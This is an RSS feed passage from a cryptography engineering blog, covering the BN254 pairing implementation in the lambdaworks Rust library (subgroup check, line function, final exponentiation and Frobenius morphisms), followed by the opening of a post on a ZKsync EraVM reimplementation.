&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if !p.is_neutral_element() &amp;amp;&amp;amp; !q.is_neutral_element() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let p = p.to_affine();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let q = q.to_affine();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            result *= miller(&amp;amp;p, &amp;amp;q);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(final_exponentiation(&amp;amp;result))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;subgroup-check&quot;&gt;Subgroup Check&lt;&#x2F;h2&gt;
&lt;p&gt;Before applying the pairing to a given pair of points $(P, Q)$, it is necessary to check that the points belong to its domain. In other words, we need to see that $P \in \mathbb{G_1 }$ and $Q \in \mathbb{G_2 }$. Since $\mathbb{G_1 } = E(\mathbb{F_p })$, there is nothing to check about $P$. But, since $\mathbb{G_2 }$ is distinct from $E’(\mathbb{F_{ p^2 }})$, we need an efficient way to check that $Q$ belongs to the subgroup.&lt;&#x2F;p&gt;
&lt;p&gt;We’ll use &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackmd.io&#x2F;@Wimet&#x2F;ry7z1Xj-2#Subgroup-Checks&quot;&gt;this post&lt;&#x2F;a&gt; that states that a point $Q \in E’(\mathbb{F_{ p^2 }})$ belongs to $\mathbb{G_2 }$ if and only if&lt;br &#x2F;&gt;
$$(x + 1)Q + \varphi (xQ) + \varphi^2 (xQ) = \varphi^3 (2xQ).$$ Recall that $x$ is one of the curve’s parameters and $\varphi$ is the Frobenius Morphism mentioned before. So first, we need to implement this morphism efficiently, avoiding raising elements to the power $p$ (because $p$ is a very large number). For that, we’ll use two constants $\gamma_{1,2}, \gamma_{1,3} \in \mathbb{F_{ p^2 }}$ (later on, we’ll see them in more detail).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub const GAMMA_12: Fp2E = Fp2E::const_from_raw([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;2FB347984F7911F74C0BEC3CF559B143B78CC310C2C3330C99E39557176F553D&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;16C9E55061EBAE204BA4CC8BD75A079432AE2A1D0B7C9DCE1665D51C640FCBA2&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub const GAMMA_13: Fp2E = Fp2E::const_from_raw([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;63CF305489AF5DCDC5EC698B6E2F9B9DBAAE0EDA9C95998DC54014671A0135A&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;7C03CBCAC41049A0704B5A7EC796F2B21807DC98FA25BD282D37F632623B0E3&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Having these constants, it’s very easy to compute $\varphi$. We simply use that $$\varphi(x, y) = (\gamma_{1,2} \bar x, \gamma_{1,3} \bar y),$$ where $\bar x$ is the notation for the conjugate of $x$: If $x = a + bu \in \mathbb{F_{ p^2 }}$, then $\bar x = a - bu.$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn phi(&amp;amp;self) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [x, y, z] = self.coordinates();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Self::new([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        x.conjugate() * GAMMA_12,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        y.conjugate() * GAMMA_13,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        z.conjugate(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
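&lt;p&gt;The fact that conjugation computes the $p$-th power in $\mathbb{F_{ p^2 }}$ can be sanity-checked on a toy field. The sketch below uses $p = 11$ and $w^2 = -1$, illustrative parameters only, not the BN254 ones:&lt;&#x2F;p&gt;

```rust
// Toy F_{p^2} = F_p[w] / (w^2 + 1) with p = 11 (so -1 is a non-residue).
// These are NOT the BN254 parameters; the point is only to check that
// the Frobenius map f -> f^p coincides with conjugation a + bw -> a - bw.
const P: u64 = 11;

#[derive(Clone, Copy, PartialEq, Debug)]
struct Fp2 {
    a: u64, // constant coefficient, mod P
    b: u64, // coefficient of w, mod P
}

// (a + bw)(c + dw) = (ac - bd) + (ad + bc)w, using w^2 = -1.
fn mul(x: Fp2, y: Fp2) -> Fp2 {
    Fp2 {
        a: (x.a * y.a + (P - 1) * (x.b * y.b % P)) % P,
        b: (x.a * y.b + x.b * y.a) % P,
    }
}

// Square-and-multiply exponentiation.
fn pow(mut base: Fp2, mut e: u64) -> Fp2 {
    let mut acc = Fp2 { a: 1, b: 0 };
    while e > 0 {
        if e % 2 == 1 {
            acc = mul(acc, base);
        }
        base = mul(base, base);
        e /= 2;
    }
    acc
}

// Conjugation: a + bw -> a - bw.
fn conjugate(x: Fp2) -> Fp2 {
    Fp2 { a: x.a, b: (P - x.b) % P }
}
```

&lt;p&gt;On this toy field, &lt;code&gt;pow(f, 11)&lt;&#x2F;code&gt; agrees with &lt;code&gt;conjugate(f)&lt;&#x2F;code&gt; for every $f$, and raising to the power $p^2$ is the identity, mirroring the properties used throughout this section.&lt;&#x2F;p&gt;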
&lt;p&gt;Now that we have $\varphi$, we can implement a function that determines whether a point $Q$ of the twisted curve $E’(\mathbb{F_{ p^2 }})$ belongs to the subgroup $\mathbb{G_2 }$.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn is_in_subgroup(&amp;amp;self) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let q_times_x = &amp;amp;self.operate_with_self(X);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let q_times_x_plus_1 = &amp;amp;self.operate_with(q_times_x);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let q_times_2x = q_times_x.double();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    q_times_x_plus_1.operate_with(&amp;amp;q_times_x.phi().operate_with(&amp;amp;q_times_x.phi().phi()))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        == q_times_2x.phi().phi().phi()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;the-line&quot;&gt;The Line&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s now see how to implement, for all $T, Q \in \mathbb{G_2 }$ and $P \in \mathbb{G_1 }$, the line $l_{T, Q}(P)$, called &lt;code&gt;line()&lt;&#x2F;code&gt; in lambdaworks. It is the fundamental function of the Miller loop. There are two cases: $T = Q$ or $T \neq Q$. In the first case, $l_{T, T} (P)$ is the tangent line at $T$ evaluated at $P$. In the second case, it is the line that passes through $T$ and $Q$ evaluated at $P.$&lt;&#x2F;p&gt;
&lt;p&gt;For our implementation, we relied on the algorithm proposed in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;722.pdf&quot;&gt;The Realm of the Pairings&lt;&#x2F;a&gt;. We use equation 11 on page 13 for the case $T = Q$ and the first equation on page 14 for the case $T \neq Q.$ You can also see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;algebra&#x2F;blob&#x2F;master&#x2F;ec&#x2F;src&#x2F;models&#x2F;bn&#x2F;g2.rs#L25&quot;&gt;Arkworks implementation&lt;&#x2F;a&gt; of the same algorithm, where the function that computes the case $T = Q$ is called &lt;code&gt;double_in_place()&lt;&#x2F;code&gt; and the one for the case $T \neq Q$ is called &lt;code&gt;add_in_place()&lt;&#x2F;code&gt;. You will see that both the paper and Arkworks define more variables than we do. That’s because those functions compute both the line and $2T$ (in the first case) or $T + Q$ (in the second case), values needed in lines 7, 10, 13, and 18 of the Ate pairing algorithm. We didn’t have to do it that way: in those lines, we double an element or add two elements of a group using the lambdaworks functions &lt;code&gt;operate_with_self()&lt;&#x2F;code&gt; and &lt;code&gt;operate_with()&lt;&#x2F;code&gt;. To simplify understanding, we kept the variable names used in the paper and in Arkworks. Notice that adding or doubling points the way they do it there only requires adding a couple of lines to our &lt;code&gt;line()&lt;&#x2F;code&gt; function, so it’s straightforward to compare both implementations and optimize ours if needed.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, it’s helpful to remark that the paper gives the result of the line as a polynomial of degree 5, while in lambdaworks, the elements of $\mathbb{F_{ p^{12} }}$ have another representation. So, we need to use the transformation explained in the Field Extensions Towers section.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn line(p: &amp;amp;G1Point, t: &amp;amp;G2Point, q: &amp;amp;G2Point) -&amp;gt; Fp12E {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [x_p, y_p, _] = p.coordinates();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if t == q {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let b = t.y().square();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let c = t.z().square();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;Define all the variables necessary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; We transform one representation of Fp12 into another one:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Fp12E::new([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Fp6E::new([y_p * (-h), Fp2E::zero(), Fp2E::zero()]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Fp6E::new([x_p * (j.double() + &amp;amp;j), i, Fp2E::zero()]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let [x_q, y_q, _] = q.coordinates();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let theta = t.y() - (y_q * t.z());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let lambda = t.x() - (x_q * t.z());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let j = &amp;amp;theta * x_q - (&amp;amp;lambda * y_q);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Fp12E::new([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Fp6E::new([y_p * lambda, Fp2E::zero(), Fp2E::zero()]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Fp6E::new([x_p * (-theta), j, Fp2E::zero()]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;final-exponentiation&quot;&gt;Final Exponentiation&lt;&#x2F;h2&gt;
&lt;p&gt;The last thing we need is to compute $f^{ \frac{ p^{12} - 1}{r}}$ efficiently. We took the final exponentiation algorithm from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackmd.io&#x2F;@Wimet&#x2F;ry7z1Xj-2#Final-Exponentiation&quot;&gt;here&lt;&#x2F;a&gt;, which splits the exponent as follows:&lt;br &#x2F;&gt;
$$\frac{ p^{12} - 1 }{r} = ( p^6 - 1) ( p^2 + 1) \frac{ p^4 - p^2 + 1}{r}$$&lt;&#x2F;p&gt;
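&lt;p&gt;This split works because $p^{12} - 1 = (p^6 - 1)(p^2 + 1)(p^4 - p^2 + 1)$ holds as a polynomial identity (and, for pairing-friendly curves, $r$ divides the cyclotomic factor $p^4 - p^2 + 1$). A quick sanity check of the identity with small toy values of $p$:&lt;&#x2F;p&gt;

```rust
// Check the integer identity behind the final-exponentiation split:
// p^12 - 1 = (p^6 - 1)(p^2 + 1)(p^4 - p^2 + 1).
// The real BN254 prime needs big integers, but the identity is polynomial
// in p, so checking it for small values of p is already meaningful.
fn split_holds(p: u128) -> bool {
    let pw = |e: u32| p.pow(e);
    pw(12) - 1 == (pw(6) - 1) * (pw(2) + 1) * (pw(4) - pw(2) + 1)
}
```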
&lt;h3 id=&quot;the-easy-part&quot;&gt;The Easy Part&lt;&#x2F;h3&gt;
&lt;p&gt;We want to compute&lt;br &#x2F;&gt;
$$f^{ ( p^6 - 1)( p^2 + 1)} = (f^{ p^6 } f^{ - 1})^{ p^2 } \cdot (f^{ p^6 } f^{- 1 }) .$$&lt;br &#x2F;&gt;
This will be easy to do using:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$f^{ p^6 } = \bar f$, which we can calculate using &lt;code&gt;conjugate()&lt;&#x2F;code&gt;. This is true because $f \in \mathbb{F_{ p^{12} }}$, and the property follows from the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;mratsim&#x2F;constantine&#x2F;blob&#x2F;master&#x2F;constantine%2Fmath%2Fpairings%2Fcyclotomic_subgroups.nim#L154&quot;&gt;Frobenius morphism as seen here&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;The function &lt;code&gt;inv()&lt;&#x2F;code&gt; computes $f^{ - 1}$.&lt;&#x2F;li&gt;
&lt;li&gt;To compute $(f^{ p^6 } f^{ - 1})^{ p^2 }$ we can use the Frobenius squared morphism $\pi_p^2 : \mathbb{F_{ p^{12} }} \to \mathbb{F_{ p^{12} }},$ defined as $$\pi_p^2 (f) = \pi_p ( \pi_p (f)) = f^{ p^2 }.$$ In the last section, we explain how to implement it.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let f_easy_aux = f.conjugate() * f.inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let f_easy = &amp;amp;frobenius_square(&amp;amp;f_easy_aux) * f_easy_aux;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;the-hard-part&quot;&gt;The Hard Part&lt;&#x2F;h3&gt;
&lt;p&gt;Now we need to raise the result of the easy part to the power $\frac{p^4 - p^2 + 1}{r}.$ We took the exact algorithm presented &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackmd.io&#x2F;@Wimet&#x2F;ry7z1Xj-2#The-Hard-Part&quot;&gt;here&lt;&#x2F;a&gt;, given as four steps, where our &lt;code&gt;f_easy&lt;&#x2F;code&gt; is called $m$. As explained in that post, this algorithm can be improved using a vectorial addition chain technique.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;frobenius-morphism&quot;&gt;Frobenius Morphism&lt;&#x2F;h2&gt;
&lt;p&gt;Finally, let’s see how to implement the Frobenius morphisms $\pi_p$, $\pi_p^2$, and $\pi_p^3$ used in the Final Exponentiation.&lt;&#x2F;p&gt;
&lt;p&gt;You may remember that we have already implemented a Frobenius morphism $\varphi$. Although they have the same name, there is a slight difference between $\varphi$ and $\pi_p$: The function $\pi_p$ raises elements of $\mathbb{F_{ p^{12} }}$ to the power $p$, while $\varphi$ raises the coordinates of the twisted curve points to the power $p$. In other words, $\pi_p : \mathbb{F_{ p^{12} }} \to \mathbb{F_{ p^{12} }}$ while $\varphi : E’(\mathbb{F_{ p^2 }}) \to E’(\mathbb{F_{ p^2 }})$. That is why their implementations are not exactly the same.&lt;&#x2F;p&gt;
&lt;p&gt;To implement these morphisms, we need to define, for all $j = 1, \ldots, 5$, the constants $$\begin{align}\gamma_{1,j} &amp;amp;= (9 + u)^{ \frac{ j ( p - 1) }{6}} \\ \gamma_{2,j} &amp;amp;= \gamma_{1,j} \cdot \overline{\gamma_{1,j}} \\ \gamma_{3,j} &amp;amp;= \gamma_{1,j} \cdot \gamma_{2,j}\end{align}$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub const GAMMA_11: Fp2E = Fp2E::const_from_raw([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;1284B71C2865A7DFE8B99FDD76E68B605C521E08292F2176D60B35DADCC9E470&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;246996F3B4FAE7E6A6327CFE12150B8E747992778EEEC7E5CA5CF05F80F362AC&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub const GAMMA_12: Fp2E = Fp2E::const_from_raw([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;2FB347984F7911F74C0BEC3CF559B143B78CC310C2C3330C99E39557176F553D&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FpE::from_hex_unchecked(&amp;quot;16C9E55061EBAE204BA4CC8BD75A079432AE2A1D0B7C9DCE1665D51C640FCBA2&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; etc.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now, we use that if $f = a + bw$ with $a = a_0 + a_1 v + a_2 v^2$ and $b = b_0 + b_1 v + b_2 v^2$, then $\pi_p(f)$ is obtained by conjugating each $\mathbb{F_{ p^2 }}$ coefficient and multiplying it by the corresponding constant $\gamma_{1,j}$:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn frobenius(f: &amp;amp;Fp12E) -&amp;gt; Fp12E {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [a, b] = f.value();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [a0, a1, a2] = a.value(); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [b0, b1, b2] = b.value(); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c1 = Fp6E::new([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        a0.conjugate(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        a1.conjugate() * GAMMA_12,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        a2.conjugate() * GAMMA_14,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c2 = Fp6E::new([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b0.conjugate() * GAMMA_11,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b1.conjugate() * GAMMA_13,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b2.conjugate() * GAMMA_15,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Fp12E::new([c1, c2])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; similarly, frobenius_square and frobenius_cube.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Lastly, if we apply $\pi_p$ twelve times, $\pi_p^2$ six times, or $\pi_p^3$ four times to $f$, we get $f$ back (i.e., they compose to the identity function). That’s because $f \in \mathbb{F_{ p^{12} }}$, and then $f^{ p ^{12} } = f.$ This property will help us test whether we implemented these morphisms correctly.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;This post explored how we combined various works and papers to implement our pairing. In doing so, we successfully integrated algorithms from different implementations by converting between point coordinate systems and between different representations of the same field extension.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-s-next&quot;&gt;What’s next?&lt;&#x2F;h4&gt;
&lt;p&gt;Now that we have a working pairing, the next step is to see how this implementation compares with others. So, we will run some benchmarks and apply some optimizations we are already aware of. As it’s written in &lt;a href=&quot;&#x2F;lambdas-engineering-philosophy&#x2F;&quot;&gt;Lambda’s Engineering Philosophy&lt;&#x2F;a&gt;: “Make it work, then make it beautiful, then if you really, really have to, make it fast.”&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How we created a research fast VM for ZKsync</title>
          <pubDate>Mon, 05 Aug 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-created-a-research-fast-vm-for-zksync/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-created-a-research-fast-vm-for-zksync/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-created-a-research-fast-vm-for-zksync/">&lt;p&gt;For the past few weeks we have been working on a reimplementation of ZKsync’s (out of circuit) EraVM. The goal is to improve on its current performance and explore the possibility of adding parallel execution through BlockSTM. For that, we first had to make a deep dive into how the EraVM works and how it differs from the EVM.&lt;&#x2F;p&gt;
